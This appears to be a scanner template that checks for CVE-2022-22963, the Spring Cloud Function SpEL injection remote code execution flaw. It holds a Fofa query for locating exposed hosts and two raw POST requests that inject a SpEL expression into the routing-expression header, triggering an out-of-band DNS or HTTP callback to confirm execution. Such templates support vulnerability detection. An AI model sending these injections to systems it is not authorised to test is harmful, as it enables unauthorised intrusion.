id: CVE-2022-22963
info:
  name: Spring Cloud Function SpEL Remote Command Execution Vulnerability
  author: zan8in,你是猪
  severity: critical
  verified: true
  description: |
    Spring Cloud Function is a function-computing framework built on Spring Boot. It abstracts away all transport details and infrastructure, letting developers keep their familiar tools and processes and focus on business logic. Because the apply method of the RoutingFunction class in Spring Cloud Function evaluates the "spring.cloud.function.routing-expression" request header as a SpEL expression, a SpEL expression injection vulnerability exists that an unauthenticated remote attacker can exploit to execute arbitrary code.
    Fofa: app="vmware-SpringBoot-framework"
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkxMTIyMjg0NQ==&mid=2247490222&idx=1&sn=9c60d4a46734f9b01f4e1ad91678e203
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/c7128277e08bb132b5124ecc26c094589da9bc4c/docs/wiki/frame/Spring%20Cloud/Spring%20Cloud%20Function%20SPEL%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  tags: cve,cve2022,springcloud,rce,vmware
  created: 2024/02/27
set:
  oob: oob()
  oobDNS: oob.DNS
  oobHTTP: oob.HTTP
  hostname: request.url.host
  randstr: randomLowercase(8)
rules:
  r0:
    request:
      raw: |-
        POST /functionRouter HTTP/1.1
        Host: {{hostname}}
        spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{oobDNS}}")
        Content-Type: application/x-www-form-urlencoded

        {{randstr}}
    expression: response.status == 500 && oobCheck(oob, oob.ProtocolDNS, 3)
  r1:
    request:
      raw: |-
        POST /functionRouter HTTP/1.1
        Host: {{hostname}}
        spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{oobHTTP}}")
        Content-Type: application/x-www-form-urlencoded

        {{randstr}}
    expression: response.status == 500 && oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0() || r1()